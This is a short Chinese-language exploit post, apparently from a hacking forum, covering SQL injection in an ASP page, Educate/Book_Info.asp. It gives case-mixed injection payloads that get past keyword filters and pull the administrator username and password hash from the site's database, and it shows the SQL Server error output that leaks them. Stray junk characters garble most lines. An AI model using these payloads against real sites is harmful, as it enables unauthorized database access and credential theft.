漏洞出现在Educate/Book_Info.asp r; C3 ?5 E% Z! {3 L
' c9 @0 z, o# t" I
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
" m0 [/ j# P1 Z2 {$ {6 M
Q# Q3 K! R* qexp:如下
( w/ z7 g: Z0 d查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
) b3 L/ t) P/ G# `查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)& \" u" k* L# w" X0 q6 f
6 Q! ^' J7 H+ d$ Q; N: Uhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
9 X# U1 k3 N3 ]8 Z! o 8 {* q/ J4 b1 e5 ` a( {
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
) n) v6 O8 R- q, O5 z# b% c - t5 ^- C( }: x6 D# h* _( t
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
) M6 R2 m& `3 D$ t$ o* U
- [5 K J9 F; h; ^9 O% U2 @/Educate/Book_Info.asp,行 8) s* e2 l$ m4 K
' w& {1 t7 W* Z; g, l1 z
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)" `0 [+ S' l* s
: u# I$ d) E& t4 l: N0 [1 Z6 nMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
b2 G5 {2 [) }3 x( f4 l/ q8 L ]3 E; i5 Z( J* K ^& s
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。3 c9 I; j# D$ d' s
& [- q1 E, l0 f4 G# I( @- [
/Educate/Book_Info.asp,行 8
$ |8 e/ w8 V- ` h T6 W |